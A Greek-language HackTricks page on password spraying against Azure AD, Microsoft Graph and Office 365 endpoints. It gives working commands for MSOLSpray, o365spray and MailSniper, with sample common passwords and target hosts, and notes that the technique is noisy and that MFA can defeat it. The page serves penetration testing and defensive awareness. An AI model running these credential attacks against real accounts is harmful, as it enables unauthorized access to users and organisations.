Az - Password Spraying

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον επαγγελματία με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Κατανομή Κωδικών

Στο Azure αυτό μπορεί να γίνει εναντίον διαφορετικών σημείων πρόσβασης στο API όπως Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, κ.λπ.

Ωστόσο, να σημειωθεί ότι αυτή η τεχνική είναι πολύ θορυβώδης και η Ομάδα Μπλε μπορεί να την ανιχνεύσει εύκολα. Επιπλέον, η απαίτηση πολυπλοκότητας κωδικού πρόσβασης και η χρήση του MFA μπορεί να καθιστούν αυτή την τεχνική ανώφελη.

Μπορείτε να εκτελέσετε μια επίθεση με κατανομή κωδικών χρησιμοποιώντας το MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Ή με το o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Ή με το MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated